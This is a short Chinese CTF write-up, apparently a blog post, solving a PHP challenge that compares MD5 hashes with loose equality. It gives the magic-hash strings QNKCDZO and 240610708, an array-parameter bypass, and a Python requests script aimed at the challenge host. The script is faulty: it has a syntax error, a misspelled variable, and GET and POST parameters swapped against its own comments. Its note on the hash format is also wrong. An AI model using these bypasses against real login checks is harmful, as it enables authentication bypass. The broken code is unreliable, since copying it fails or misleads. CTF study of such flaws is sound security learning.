分析一下代码, name 不等于password ,namd,md5值和password,md5值相等。get传参name,post传参password。
$name != $password && md5($name) == md5($password) 属于MD5绕过中的php == 弱类型绕过
有两个办法,
第一个办法就是
import requests
#网站的URL
url = "http://node7.anna.nssctf.cn:25352"
#get方法传递name的参数
name = "QNKCDZO"
#用post方法传递password的参数
password = "240610708"
#两个参数的md5值均以0e开头后面的字符纯字符
#发送post和get请求,并获取响应对象
response = requests.post(url,data={"name":name}params={"password":password})
#打印响应的文本内容
print(reponse.text)第二个方法就是
get传参name[]=1,post传参password[]=2
标签:传参,name,get,2021,easy,post,password,md5 From: https://blog.csdn.net/2301_79210256/article/details/142567623